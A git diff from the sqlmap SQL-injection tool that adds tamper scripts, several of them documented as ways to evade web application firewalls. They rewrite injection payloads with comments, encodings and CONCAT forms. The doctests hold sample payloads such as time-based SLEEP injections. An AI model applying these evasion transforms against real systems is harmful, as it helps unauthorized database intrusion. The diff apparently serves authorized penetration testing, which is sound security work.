a/tamper/charencode.py +++ b/tamper/charencode.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/charunicodeencode.py b/tamper/charunicodeencode.py index 09e602957..d578439e5 100644 --- a/tamper/charunicodeencode.py +++ b/tamper/charunicodeencode.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/commalesslimit.py b/tamper/commalesslimit.py new file mode 100644 index 000000000..a88fefedb --- /dev/null +++ b/tamper/commalesslimit.py @@ -0,0 +1,37 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) +See the file 'doc/COPYING' for copying permission +""" + +import re + +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.HIGH + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M' + + Requirement: + * MySQL + + Tested against: + * MySQL 5.0 and 5.5 + + >>> tamper('LIMIT 2, 3') + 'LIMIT 3 OFFSET 2' + """ + + retVal = payload + + match = re.search(r"(?i)LIMIT\s*(\d+),\s*(\d+)", payload or "") + if match: + retVal = retVal.replace(match.group(0), "LIMIT %s OFFSET %s" % (match.group(2), match.group(1))) + + return retVal diff --git a/tamper/commalessmid.py b/tamper/commalessmid.py new file mode 100644 index 000000000..caebbc190 --- /dev/null +++ b/tamper/commalessmid.py @@ -0,0 +1,43 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) +See the file 'doc/COPYING' for copying permission +""" + +import os +import re + +from lib.core.common import singleTimeWarnMessage +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.HIGH + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)' + + Requirement: + * MySQL + + Tested against: + * MySQL 5.0 and 5.5 + + >>> tamper('MID(VERSION(), 1, 1)') + 'MID(VERSION() FROM 1 FOR 1)' + """ + + retVal = payload + + warnMsg = "you should consider usage of switch '--no-cast' along with " + warnMsg += "tamper script '%s'" % os.path.basename(__file__).split(".")[0] + singleTimeWarnMessage(warnMsg) + + match = re.search(r"(?i)MID\((.+?)\s*,\s*(\d+)\s*\,\s*(\d+)\s*\)", payload or "") + if match: + retVal = retVal.replace(match.group(0), "MID(%s FROM %s FOR %s)" % (match.group(1), match.group(2), match.group(3))) + + return retVal diff --git a/tamper/commentbeforeparentheses.py b/tamper/commentbeforeparentheses.py new file mode 100644 index 000000000..59185002a --- /dev/null +++ b/tamper/commentbeforeparentheses.py @@ -0,0 +1,40 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) +See the file 'doc/COPYING' for copying permission +""" + +import re + +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.LOW + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Prepends (inline) comment before parentheses + + Tested against: + * Microsoft SQL Server + * MySQL + * Oracle + * PostgreSQL + + Notes: + * Useful to bypass web application firewalls that block usage + of function calls + + >>> tamper('SELECT ABS(1)') + 'SELECT ABS/**/(1)' + """ + + retVal = payload + + if payload: + retVal = re.sub(r"\b(\w+)\(", "\g<1>/**/(", retVal) + + return retVal diff --git a/tamper/concat2concatws.py b/tamper/concat2concatws.py index 5182bd8d5..92404a060 100644 --- a/tamper/concat2concatws.py +++ b/tamper/concat2concatws.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/equaltolike.py b/tamper/equaltolike.py index d9ccf0082..1aa5a47a3 100644 --- a/tamper/equaltolike.py +++ b/tamper/equaltolike.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -35,15 +35,9 @@ def tamper(payload, **kwargs): 'SELECT * FROM users WHERE id LIKE 1' """ - def process(match): - word = match.group() - word = "%sLIKE%s" % (" " if word[0] != " " else "", " " if word[-1] != " " else "") - - return word - retVal = payload if payload: - retVal = re.sub(r"\s*=\s*", lambda match: process(match), retVal) + retVal = re.sub(r"\s*=\s*", " LIKE ", retVal) return retVal diff --git a/tamper/escapequotes.py b/tamper/escapequotes.py new file mode 100644 index 000000000..6b5dd5134 --- /dev/null +++ b/tamper/escapequotes.py @@ -0,0 +1,23 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) +See the file 'doc/COPYING' for copying permission +""" + +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.LOWEST + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Slash escape quotes (' and ") + + >>> tamper('1" AND SLEEP(5)#') + '1\\\\" AND SLEEP(5)#' + """ + + return payload.replace("'", "\\'").replace('"', '\\"') diff --git a/tamper/greatest.py b/tamper/greatest.py index a1c3f8df3..012cc6771 100644 --- a/tamper/greatest.py +++ b/tamper/greatest.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/halfversionedmorekeywords.py b/tamper/halfversionedmorekeywords.py index c0d0eea5c..ef9c4ff61 100644 --- a/tamper/halfversionedmorekeywords.py +++ b/tamper/halfversionedmorekeywords.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/htmlencode.py b/tamper/htmlencode.py new file mode 100644 index 000000000..d30d11884 --- /dev/null +++ b/tamper/htmlencode.py @@ -0,0 +1,25 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) +See the file 'doc/COPYING' for copying permission +""" + +import re + +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.LOW + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + HTML encode (using code points) all non-alphanumeric characters + + >>> tamper("1' AND SLEEP(5)#") + '1' AND SLEEP(5)#' + """ + + return re.sub(r"[^\w]", lambda match: "&#%d;" % ord(match.group(0)), payload) if payload else payload diff --git a/tamper/ifnull2ifisnull.py b/tamper/ifnull2ifisnull.py index 499cc6218..5772492b1 100644 --- a/tamper/ifnull2ifisnull.py +++ b/tamper/ifnull2ifisnull.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/informationschemacomment.py b/tamper/informationschemacomment.py index 7c146a30e..31cb5872b 100644 --- a/tamper/informationschemacomment.py +++ b/tamper/informationschemacomment.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/lowercase.py b/tamper/lowercase.py index e06706af5..f13830488 100644 --- a/tamper/lowercase.py +++ b/tamper/lowercase.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/modsecurityversioned.py b/tamper/modsecurityversioned.py index 1d38e5344..54945b440 100644 --- a/tamper/modsecurityversioned.py +++ b/tamper/modsecurityversioned.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/modsecurityzeroversioned.py b/tamper/modsecurityzeroversioned.py index ac13da0b8..1f476218c 100644 --- a/tamper/modsecurityzeroversioned.py +++ b/tamper/modsecurityzeroversioned.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/multiplespaces.py b/tamper/multiplespaces.py index c08607512..36fb7155c 100644 --- a/tamper/multiplespaces.py +++ b/tamper/multiplespaces.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/nonrecursivereplacement.py b/tamper/nonrecursivereplacement.py index 5feb443cc..864bf3962 100644 --- a/tamper/nonrecursivereplacement.py +++ b/tamper/nonrecursivereplacement.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/overlongutf8.py b/tamper/overlongutf8.py index ac2885d7a..5335148fe 100644 --- a/tamper/overlongutf8.py +++ b/tamper/overlongutf8.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/percentage.py b/tamper/percentage.py index e54495739..167e58b83 100644 --- a/tamper/percentage.py +++ b/tamper/percentage.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/plus2concat.py b/tamper/plus2concat.py new file mode 100644 index 000000000..77f6c104c --- /dev/null +++ b/tamper/plus2concat.py @@ -0,0 +1,76 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) +See the file 'doc/COPYING' for copying permission +""" + +import re + +from lib.core.common import zeroDepthSearch +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.HIGHEST + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Replaces plus ('+') character with function CONCAT() + + Tested against: + * Microsoft SQL Server 2012 + + Requirements: + * Microsoft SQL Server 2012+ + + Notes: + * Useful in case ('+') character is filtered + + >>> tamper('SELECT CHAR(113)+CHAR(114)+CHAR(115) FROM DUAL') + 'SELECT CONCAT(CHAR(113),CHAR(114),CHAR(115)) FROM DUAL' + + >>> tamper('SELECT (CHAR(113)+CHAR(114)+CHAR(115)) FROM DUAL') + 'SELECT CONCAT(CHAR(113),CHAR(114),CHAR(115)) FROM DUAL' + """ + + retVal = payload + + if payload: + while True: + indexes = zeroDepthSearch(retVal, '+') + + if indexes: + first, last = 0, 0 + for i in xrange(1, len(indexes)): + if ' ' in retVal[indexes[0]:indexes[i]]: + break + else: + last = i + + start = retVal[:indexes[first]].rfind(' ') + 1 + end = (retVal[indexes[last] + 1:].find(' ') + indexes[last] + 1) if ' ' in retVal[indexes[last] + 1:] else len(retVal) - 1 + + chars = [char for char in retVal] + for index in indexes[first:last + 1]: + chars[index] = ',' + + retVal = "%sCONCAT(%s)%s" % (retVal[:start], ''.join(chars)[start:end], retVal[end:]) + else: + match = re.search(r"\((CHAR\(\d+.+CHAR\(\d+\))\)", retVal) + if match: + part = match.group(0) + indexes = set(zeroDepthSearch(match.group(1), '+')) + if not indexes: + break + chars = [char for char in part] + for i in xrange(1, len(chars)): + if i - 1 in indexes: + chars[i] = ',' + replacement = "CONCAT%s" % "".join(chars) + retVal = retVal.replace(part, replacement) + else: + break + + return retVal diff --git a/tamper/plus2fnconcat.py b/tamper/plus2fnconcat.py new file mode 100644 index 000000000..a7b4fe9a8 --- /dev/null +++ b/tamper/plus2fnconcat.py @@ -0,0 +1,89 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) +See the file 'doc/COPYING' for copying permission +""" + +import re + +from lib.core.common import zeroDepthSearch +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.HIGHEST + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Replaces plus ('+') character with ODBC function {fn CONCAT()} + + Tested against: + * Microsoft SQL Server 2008 + + Requirements: + * Microsoft SQL Server 2008+ + + Notes: + * Useful in case ('+') character is filtered + * https://msdn.microsoft.com/en-us/library/bb630290.aspx + + >>> tamper('SELECT CHAR(113)+CHAR(114)+CHAR(115) FROM DUAL') + 'SELECT {fn CONCAT({fn CONCAT(CHAR(113),CHAR(114))},CHAR(115))} FROM DUAL' + + >>> tamper('SELECT (CHAR(113)+CHAR(114)+CHAR(115)) FROM DUAL') + 'SELECT {fn CONCAT({fn CONCAT(CHAR(113),CHAR(114))},CHAR(115))} FROM DUAL' + """ + + retVal = payload + + if payload: + while True: + indexes = zeroDepthSearch(retVal, '+') + + if indexes: + first, last = 0, 0 + for i in xrange(1, len(indexes)): + if ' ' in retVal[indexes[0]:indexes[i]]: + break + else: + last = i + + start = retVal[:indexes[first]].rfind(' ') + 1 + end = (retVal[indexes[last] + 1:].find(' ') + indexes[last] + 1) if ' ' in retVal[indexes[last] + 1:] else len(retVal) - 1 + + count = 0 + chars = [char for char in retVal] + for index in indexes[first:last + 1]: + if count == 0: + chars[index] = ',' + else: + chars[index] = '\x01' + count += 1 + + retVal = "%s%s%s)}%s" % (retVal[:start], "{fn CONCAT(" * count, ''.join(chars)[start:end].replace('\x01', ")},"), retVal[end:]) + else: + match = re.search(r"\((CHAR\(\d+.+CHAR\(\d+\))\)", retVal) + if match: + part = match.group(0) + indexes = set(zeroDepthSearch(match.group(1), '+')) + if not indexes: + break + + count = 0 + chars = [char for char in part] + for i in xrange(1, len(chars)): + if i - 1 in indexes: + if count == 0: + chars[i] = ',' + else: + chars[i] = '\x01' + count += 1 + + replacement = "%s%s}" % (("{fn CONCAT(" * count)[:-1], "".join(chars).replace('\x01', ")},")) + retVal = retVal.replace(part, replacement) + else: + break + + return retVal diff --git a/tamper/randomcase.py b/tamper/randomcase.py index a188ff0cc..62b858b1c 100644 --- a/tamper/randomcase.py +++ b/tamper/randomcase.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/randomcomments.py b/tamper/randomcomments.py index 6c0894eb1..e2e6d95c9 100644 --- a/tamper/randomcomments.py +++ b/tamper/randomcomments.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/securesphere.py b/tamper/securesphere.py index ab83f46fc..364143839 100644 --- a/tamper/securesphere.py +++ b/tamper/securesphere.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/sp_password.py b/tamper/sp_password.py index 959e50257..ef6c92d15 100644 --- a/tamper/sp_password.py +++ b/tamper/sp_password.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/space2comment.py b/tamper/space2comment.py index 399a2c0ee..120c060d3 100644 --- a/tamper/space2comment.py +++ b/tamper/space2comment.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/space2dash.py b/tamper/space2dash.py index cdd828d56..1a8b2a964 100644 --- a/tamper/space2dash.py +++ b/tamper/space2dash.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/space2hash.py b/tamper/space2hash.py index a50a3a7c2..ae7f8e491 100644 --- a/tamper/space2hash.py +++ b/tamper/space2hash.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/space2morecomment.py b/tamper/space2morecomment.py new file mode 100644 index 000000000..6b4829c60 --- /dev/null +++ b/tamper/space2morecomment.py @@ -0,0 +1,54 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) +See the file 'doc/COPYING' for copying permission +""" + +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.LOW + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Replaces space character (' ') with comments '/**_**/' + + Tested against: + * MySQL 5.0 and 5.5 + + Notes: + * Useful to bypass weak and bespoke web application firewalls + + >>> tamper('SELECT id FROM users') + 'SELECT/**_**/id/**_**/FROM/**_**/users' + """ + + retVal = payload + + if payload: + retVal = "" + quote, doublequote, firstspace = False, False, False + + for i in xrange(len(payload)): + if not firstspace: + if payload[i].isspace(): + firstspace = True + retVal += "/**_**/" + continue + + elif payload[i] == '\'': + quote = not quote + + elif payload[i] == '"': + doublequote = not doublequote + + elif payload[i] == " " and not doublequote and not quote: + retVal += "/**_**/" + continue + + retVal += payload[i] + + return retVal diff --git a/tamper/space2morehash.py b/tamper/space2morehash.py index 0dbaf5c2a..ccd20404b 100644 --- a/tamper/space2morehash.py +++ b/tamper/space2morehash.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/space2mssqlblank.py b/tamper/space2mssqlblank.py index fc0542f53..0502af24a 100644 --- a/tamper/space2mssqlblank.py +++ b/tamper/space2mssqlblank.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/space2mssqlhash.py b/tamper/space2mssqlhash.py index cddfd6179..030ebb13e 100644 --- a/tamper/space2mssqlhash.py +++ b/tamper/space2mssqlhash.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/space2mysqlblank.py b/tamper/space2mysqlblank.py index a0ac1da68..caddab148 100644 --- a/tamper/space2mysqlblank.py +++ b/tamper/space2mysqlblank.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -42,7 +42,8 @@ def tamper(payload, **kwargs): # FF 0C new page # CR 0D carriage return # VT 0B vertical TAB (MySQL and Microsoft SQL Server only) - blanks = ('%09', '%0A', '%0C', '%0D', '%0B') + # A0 non-breaking space + blanks = ('%09', '%0A', '%0C', '%0D', '%0B', '%A0') retVal = payload if payload: diff --git a/tamper/space2mysqldash.py b/tamper/space2mysqldash.py index 4a4f9821c..84e5681a9 100644 --- a/tamper/space2mysqldash.py +++ b/tamper/space2mysqldash.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/space2plus.py b/tamper/space2plus.py index 38211026a..2ffafc728 100644 --- a/tamper/space2plus.py +++ b/tamper/space2plus.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/space2randomblank.py b/tamper/space2randomblank.py index 98612534a..4469dde7c 100644 --- a/tamper/space2randomblank.py +++ b/tamper/space2randomblank.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/symboliclogical.py b/tamper/symboliclogical.py index cb8e91630..fe4abc42c 100644 --- a/tamper/symboliclogical.py +++ b/tamper/symboliclogical.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -19,7 +19,7 @@ def tamper(payload, **kwargs): Replaces AND and OR logical operators with their symbolic counterparts (&& and ||) >>> tamper("1 AND '1'='1") - '1 && '1'='1' + "1 %26%26 '1'='1" """ retVal = payload diff --git a/tamper/unionalltounion.py b/tamper/unionalltounion.py index 3bb234141..ff981490e 100644 --- a/tamper/unionalltounion.py +++ b/tamper/unionalltounion.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/unmagicquotes.py b/tamper/unmagicquotes.py index c2bcca8da..c57732edd 100644 --- a/tamper/unmagicquotes.py +++ b/tamper/unmagicquotes.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/uppercase.py b/tamper/uppercase.py new file mode 100644 index 000000000..5b6dcdaeb --- /dev/null +++ b/tamper/uppercase.py @@ -0,0 +1,46 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) +See the file 'doc/COPYING' for copying permission +""" + +import re + +from lib.core.data import kb +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.NORMAL + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Replaces each keyword character with upper case value + + Tested against: + * Microsoft SQL Server 2005 + * MySQL 4, 5.0 and 5.5 + * Oracle 10g + * PostgreSQL 8.3, 8.4, 9.0 + + Notes: + * Useful to bypass very weak and bespoke web application firewalls + that has poorly written permissive regular expressions + * This tamper script should work against all (?) databases + + >>> tamper('insert') + 'INSERT' + """ + + retVal = payload + + if payload: + for match in re.finditer(r"[A-Za-z_]+", retVal): + word = match.group() + + if word.upper() in kb.keywords: + retVal = retVal.replace(word, word.upper()) + + return retVal diff --git a/tamper/varnish.py b/tamper/varnish.py index 00d54bb43..0dd3cadd2 100644 --- a/tamper/varnish.py +++ b/tamper/varnish.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/versionedkeywords.py b/tamper/versionedkeywords.py index 7c5c5db32..9f4ed8637 100644 --- a/tamper/versionedkeywords.py +++ b/tamper/versionedkeywords.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/versionedmorekeywords.py b/tamper/versionedmorekeywords.py index d5fc44db1..01081f173 100644 --- a/tamper/versionedmorekeywords.py +++ b/tamper/versionedmorekeywords.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/xforwardedfor.py b/tamper/xforwardedfor.py index e2bcdbca9..b6bf02491 100644 --- a/tamper/xforwardedfor.py +++ b/tamper/xforwardedfor.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/thirdparty/ansistrm/ansistrm.py b/thirdparty/ansistrm/ansistrm.py index 95d2b00be..9f3a6c5ec 100644 --- a/thirdparty/ansistrm/ansistrm.py +++ b/thirdparty/ansistrm/ansistrm.py @@ -4,9 +4,22 @@ import logging import os import re +import subprocess +import sys from lib.core.convert import stdoutencode +if subprocess.mswindows: + import ctypes + import ctypes.wintypes + + # Reference: https://gist.github.com/vsajip/758430 + # https://github.com/ipython/ipython/issues/4252 + # https://msdn.microsoft.com/en-us/library/windows/desktop/ms686047%28v=vs.85%29.aspx + ctypes.windll.kernel32.SetConsoleTextAttribute.argtypes = [ctypes.wintypes.HANDLE, ctypes.wintypes.WORD] + ctypes.windll.kernel32.SetConsoleTextAttribute.restype = ctypes.wintypes.BOOL + + class ColorizingStreamHandler(logging.StreamHandler): # color names to indices color_map = { @@ -21,22 +34,13 @@ class ColorizingStreamHandler(logging.StreamHandler): } # levels to (background, foreground, bold/intense) - if os.name == 'nt': - level_map = { - logging.DEBUG: (None, 'blue', False), - logging.INFO: (None, 'green', False), - logging.WARNING: (None, 'yellow', False), - logging.ERROR: (None, 'red', False), - logging.CRITICAL: ('red', 'white', False) - } - else: - level_map = { - logging.DEBUG: (None, 'blue', False), - logging.INFO: (None, 'green', False), - logging.WARNING: (None, 'yellow', False), - logging.ERROR: (None, 'red', False), - logging.CRITICAL: ('red', 'white', False) - } + level_map = { + logging.DEBUG: (None, 'blue', False), + logging.INFO: (None, 'green', False), + logging.WARNING: (None, 'yellow', False), + logging.ERROR: (None, 'red', False), + logging.CRITICAL: ('red', 'white', False) + } csi = '\x1b[' reset = '\x1b[0m' disable_coloring = False @@ -67,7 +71,7 @@ class ColorizingStreamHandler(logging.StreamHandler): except: self.handleError(record) - if os.name != 'nt': + if not subprocess.mswindows: def output_colorized(self, message): self.stream.write(message) else: @@ -85,8 +89,6 @@ class ColorizingStreamHandler(logging.StreamHandler): } def output_colorized(self, message): - import ctypes - parts = self.ansi_esc.split(message) write = self.stream.write h = None diff --git a/thirdparty/beautifulsoup/beautifulsoup.py b/thirdparty/beautifulsoup/beautifulsoup.py index cde92ee11..c088fb0b3 100644 --- a/thirdparty/beautifulsoup/beautifulsoup.py +++ b/thirdparty/beautifulsoup/beautifulsoup.py @@ -79,8 +79,8 @@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE, DAMMIT. from __future__ import generators __author__ = "Leonard Richardson (leonardr@segfault.org)" -__version__ = "3.2.0" -__copyright__ = "Copyright (c) 2004-2010 Leonard Richardson" +__version__ = "3.2.1" +__copyright__ = "Copyright (c) 2004-2012 Leonard Richardson" __license__ = "New-style BSD" from sgmllib import SGMLParser, SGMLParseError @@ -114,6 +114,21 @@ class PageElement(object): """Contains the navigational information for some part of the page (either a tag or a piece of text)""" + def _invert(h): + "Cheap function to invert a hash." + i = {} + for k,v in h.items(): + i[v] = k + return i + + XML_ENTITIES_TO_SPECIAL_CHARS = { "apos" : "'", + "quot" : '"', + "amp" : "&", + "lt" : "<", + "gt" : ">" } + + XML_SPECIAL_CHARS_TO_ENTITIES = _invert(XML_ENTITIES_TO_SPECIAL_CHARS) + def setup(self, parent=None, previous=None): """Sets up the initial relations between this element and other elements.""" @@ -421,6 +436,16 @@ class PageElement(object): s = unicode(s) return s + BARE_AMPERSAND_OR_BRACKET = re.compile("([<>]|" + + "&(?!#\d+;|#x[0-9a-fA-F]+;|\w+;)" + + ")") + + def _sub_entity(self, x): + """Used with a regular expression to substitute the + appropriate XML entity for an XML special character.""" + return "&" + self.XML_SPECIAL_CHARS_TO_ENTITIES[x.group(0)[0]] + ";" + + class NavigableString(unicode, PageElement): def __new__(cls, value): @@ -451,10 +476,12 @@ class NavigableString(unicode, PageElement): return str(self).decode(DEFAULT_OUTPUT_ENCODING) def 